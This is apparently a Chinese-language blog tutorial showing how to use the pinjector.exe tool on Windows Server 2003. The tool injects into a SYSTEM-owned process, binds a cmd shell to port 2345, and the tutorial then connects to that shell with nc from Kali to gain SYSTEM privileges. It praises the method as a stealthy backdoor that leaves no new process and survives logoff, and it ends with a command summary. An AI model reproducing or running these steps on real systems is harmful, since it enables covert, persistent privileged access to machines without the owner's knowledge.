注入進程提權【相當於開了一個后門,隱蔽性極高,不會創建新的進程,很難發現】
注入到system用戶的進程,當管理員賬戶或其他賬戶注銷后,后門仍然存在。可以理解為將pinjector注入到其他用戶的進程里一起運行,進而同時擁有了對應的權限。
下面是圖文教程。
0x01
從http://www.tarasco.org/security/Process_Injector/ 下載pinjector.exe文件。放在windows2003server的c盤根目錄。
0x02將壓縮包中的pinjector.exe提取出放在c盤根目錄。
0x03執行pinjector.exe -l 可查看可以注入的進程。
可以看到不同的進程對應不同PID和用戶。
0x04執行pinjector.exe -p 600 cmd 2345 注入進程pid為600的進程,使用端口2345返回cmd,執行成功后在任務管理器里並沒有多出進程。
0x05使用kali的nc 192.168.70.135 2345
反彈shell並提權為system。
<script>
window.tctipConfig = {
staticPrefix: "http://static.tctip.com",
buttonImageId: 1,
buttonTip: "zanzhu",
list:{
alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},
weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},
}
};
</script>
<script src="http://static.tctip.com/js/tctip.min.js"></script>
#####################################################################################################################
總結
將進程注入system服務進程
pinjector.exe進程注入器
http://www.tarasco.org/security/Process_Injector/ {需要FQ下載}
###pinjector.exe -l#查看可注入進程
###pinjector.exe -p <PID> cmd <ports>
nc -nv <IP> <ports> //監聽端口。成功后會反彈system的shell。